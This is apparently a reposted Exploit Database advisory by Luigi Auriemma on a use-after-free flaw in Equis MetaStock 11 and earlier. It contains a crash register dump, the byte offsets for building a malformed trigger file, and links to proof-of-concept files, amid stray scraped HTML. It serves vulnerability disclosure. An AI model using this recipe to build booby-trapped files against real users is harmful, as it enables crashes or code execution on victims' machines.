Equis MetaStock 11 – Use-After-Free

• Exploit Database
• 110 阅读

• 作者： Luigi Auriemma
  日期： 2011-09-14
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/17836/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85

  #######################################################################   Luigi Auriemma   Application:Equis MetaStock <blockquote class="wp-embedded-content" data-secret="6BGcoCpjRN"><a href="https://www.equis.com/" target="_blank"rel="external nofollow" class="external" >Home</a></blockquote><iframe class="wp-embedded-content" sandbox="allow-scripts" security="restricted" style="position: absolute; visibility: hidden;" title="“Home” — Equis Development Pte. Ltd." src="https://www.equis.com/embed/#?secret=4IvqiKAQEj#?secret=6BGcoCpjRN" data-secret="6BGcoCpjRN" frameborder="0" marginmarginscrolling="no"></iframe> Versions: <= 11 Platforms:Windows Bug:use after free Exploitation: file Date: 06 Sep 2011 Author: Luigi Auriemma e-mail: aluigi@autistici.org web:aluigi.org     #######################################################################     1) Introduction 2) Bug 3) The Code 4) Fix     #######################################################################   =============== 1) Introduction ===============     MetaStock is the most used and awarded software for performing technical analysis of stocks, futures, forex, commodities, indices and other financial instruments.     #######################################################################   ====== 2) Bug ======     All the files supported by MetaStock (mwc/mws charts, mwt templates and mwl layout) cause an use-after-free vulnerability exploitable through invalid and malformed files:   eax=41414141 ebx=73eccedd ecx=01028620 edx=00000004 esi=010283c0 edi=0012e748 eip=00486378 esp=0012deb0 ebp=0012e754 iopl=0 nv up ei pl nz na po nc cs=001bss=0023ds=0023es=0023fs=003bgs=0000 efl=00010202 Mswin+0x86378: 00486378 ff5004calldword ptr [eax+4]ds:0023:41414145=????????   Modified bytes: 0000308B 1E 40 00003214 74 41; eax 0x41414141 on Windows 2003 Server 00003215 69 41 00003216 76 41 00003217 65 41     #######################################################################   =========== 3) The Code ===========     http://aluigi.org/poc/metastock_1.mwl https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/17836.mwl     #######################################################################   ====== 4) Fix ======     No fix.     #######################################################################